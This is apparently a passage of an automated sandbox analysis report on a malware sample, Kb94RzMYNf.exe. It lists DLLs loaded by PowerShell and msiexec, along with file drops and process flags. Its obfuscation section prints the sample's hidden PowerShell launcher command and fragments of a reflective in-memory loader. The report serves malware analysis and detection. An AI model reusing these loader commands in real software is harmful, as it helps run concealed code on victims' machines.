            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\Kb94RzMYNf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: Kb94RzMYNf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            barindex
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Edental $Ksemaforen $Overmellowly), (Jyskhedens @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Preincline = [AppDomain]::CurrentDomain.GetAssemblies()$glo
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Bevrtendes)), $Kantebaand).DefineDynamicModule($Hoejadel, $false).DefineType($Scenegulvene, $Skattepligtig185, [System.MulticastDelega
            Source: C:\Users\user\Desktop\Kb94RzMYNf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$afsmitnings=gc -raw 'C:\Users\user\AppData\Local\neoimpressionism\Sunsetting.Spe';$Overbefolkede=$afsmitnings.SubString(6903,3);.$Overbefolkede($afsmitnings) "
            Source: C:\Users\user\Desktop\Kb94RzMYNf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$afsmitnings=gc -raw 'C:\Users\user\AppData\Local\neoimpressionism\Sunsetting.Spe';$Overbefolkede=$afsmitnings.SubString(6903,3);.$Overbefolkede($afsmitnings) "Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_000E891E pushad ; iretd 5_2_000E891F
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_000E8C2F pushfd ; iretd 5_2_000E8C30
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_000E2D49 push 8BFFFFFFh; retf 5_2_000E2D4F
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_000E8DDF push esp; iretd 5_2_000E8DE0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\neoimpressionism\Kb94RzMYNf.exeJump to dropped file
            Source: C:\Users\user\Desktop\Kb94RzMYNf.exeFile created: C:\Users\user\AppData\Local\Temp\nsj9A32.tmp\nsExec.dllJump to dropped file

            Hooking and other Techniques for Hiding and Protection

            barindex
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Users\user\Desktop\Kb94RzMYNf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
